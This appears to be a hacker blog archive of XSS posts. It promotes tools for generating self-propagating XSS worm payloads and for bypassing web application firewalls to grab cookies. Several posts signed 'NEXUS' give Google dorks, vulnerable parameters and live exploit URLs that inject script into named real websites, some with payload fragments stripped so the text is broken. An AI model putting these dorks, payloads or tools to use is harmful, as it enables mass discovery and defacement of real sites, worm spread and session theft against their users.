Affichage des articles dont le libellé est Xss. Afficher tous les articles
Affichage des articles dont le libellé est Xss. Afficher tous les articles

xssless: An Automated XSS Payload Generator

Xssless is an automated XSS payload generator written in python.

Usage

  1. Record request(s) with Burp proxy
  2. Select request(s) you want to generate, then right click and select "Save items"
  3. Use xssless to generate your payload: ./xssless.py burp_export_file
  4. Pwn!

Features

  • Automated XSS payload generation from imported Burp proxy requests
  • Payloads are 100% asynchronous and won't freeze the user's browser
  • Payloads are optimized, but should be minimized by a third party tool
  • CSRF tokens can be easily extracted and set via the -p option
  • POST multipart is supported, along with XSS file uploading via the -f option
  • Payloads are dynamic and portable (due to relative URLs)
  • Self propagation is now supported - meaning you can set a POST value to the payload itself!
  • Crazy JavaScript worms with no hassle!

Installation

Download the latest xssless:

git clone https://github.com/mandatoryprogrammer/xssless

Run the script:
./xssless.py -h


Download and read more at

~ lundi 24 août 2015 0 commentaires

XSSYA - Cross Site Scripting Scanner & Vulnerability Confirmation

Cross-Site-Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

What is XSSYA?




When Web application Penetration Tester start to scan web site using vulnerability scanners it give him false positive vulnerabilities and that happen because a lot of scanners using the method of request and response the scanner execute the payload and if the response 200 then it's vulnerable in fact that is not enough to confirm the vulnerability and in this case the penetration tester need to confirm it manually Here XSSYA come to Confirm XSS -Cross Site Scripting Vulnerability without Using the Browser.

XSSYA How IT Works ?

XSSYA work by execute the payload encoded to bypass Web Application Firewall which is the first method request and response if it respond 200 it turn to Method 2 which search that payload decoded in web page HTML code if it confirmed get the last step which is execute document.cookie to get the cookie.



Features

* Support HTTPS
* After Confirmation (execute payload to get cookies)
* Can be run in (Windows - Linux)
* Identify 3 types of WAF (Mod_Security - WebKnight - F5 BIG IP)
*XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall)
* Support Saving The Web HTML Code Before Executing the Payload Viewing the Web HTML Code into the Screen or Terminal

Cross Site Scripting Scanner Video Tutorial 



Download



~ samedi 10 janvier 2015 0 commentaires

[XSS] noname-media

ProActive CMS - XSS

Joomla Aclassif - XSS

Pro-Service - XSS Vulnerability

MyBB Kingchat - XSS

Dork:
inurl:/kingchat.php?

Exploit:
 /kingchat.php?notic

Change that /... into this to see exploit:
 /kingchat.php?chat=2&l=2

Then add your scripts...

Live Demo:
http://www.embargoedchat.co.uk/kingchat.php?chat=2&l=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

 NEXUS - Sharing Is Caring

~ 0 commentaires

Pej Studio & Nissi Infotech & Plante Graffix - Cross Site Scripting (XSS)

Seventeen Design XSS & SQLI


~ vendredi 4 juillet 2014 0 commentaires

Espacio Ecuador XSS & SQLI


~ 0 commentaires

Arwen Cross Site Scripting & SQL Injection

MD Webmarketing Cross Site Scripting / SQL Injection

milkshakedesign CMS - XSS Vulnerability

XSS Found By NEXUS !

I found all XSS in those sites :D
http://pastebin.com/fGSr5sn3
NEXUS 

~ 0 commentaires

mc-creation CMS - XSS Vulnerability

Morgane CMS - XSS Vulnerability

Kingcow CMS Cross Site Scripting

Dorks:
inurl:"search.php?for="
intext:"Powered by Central" 
* for parameter in search.php is VULNERABLE to XSS..

Exploits:
">&search_submit=Search
Or if you can't use normal script.. Change it from string to character: 
">&search_submit=Search
 These char "String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33)" is "HaCked By NEXUS !" using Hack Bar of Firefox...



If you dont have that "Hack Bar" .. Download it from :
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
Live Demo:
http://hdmixtapes.com/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E&search_submit=Search
http://artnews.org/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083%29%29;%3C/script%3E&search_submit=Search
NEXUS 

~ mardi 1 juillet 2014 0 commentaires

Cm3 CMS Cross Site Scripting (XSS)

Dork:
intext:"Powered by cm3"
* Keywords & strSearchPhrase Parametrs In Search.asp Are Vulnerable to XSS..

Exploits:
http://www.NEXUS.com/forums/search.asp?strSearchPhrase=">&ContainerID=&forumsearchoption=topics
http://www.NEXUS,com/search.asp?keywords=">&SearchType=And&;CurrentPage=1
http://www.NEXUS.com/search.asp?CurrentPage=1&sitekeywords">&;SearchType=Default 
http://www.NEXUS.com/search.asp?SearchType=Keywords&Keywords=">&x=0&y=0 
Live Demo:
http://www.ergonomics.org.au/forums/search.asp?strSearchPhrase=%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29;%3C/script%3E&ContainerID=&forumsearchoption=topics 

NEXUS 

~ 0 commentaires

XSS Vulnerability

Dork:
inurl:"/showcatrows.php?CategoryID="
Exploit:
">

HaCked By NEXUS

 
./ NEXUS 




~ mercredi 25 juin 2014 0 commentaires

XSS Bug Found in Blogspot Sites







An XSS  bug has been found by the member of the famous BlackHat team in Indonesia, Indonesian Cyber Army

Dork:

inurl:/feeds/posts/

Live Demo:
http://avematic-security.blogspot.com/feeds/posts/K3RAMA7_W4S_H3RE 

Preview:
Credit to:
             - Bug Founder
             - My friend from Gh0sts team, told me about this bug.

~ mardi 24 juin 2014 0 commentaires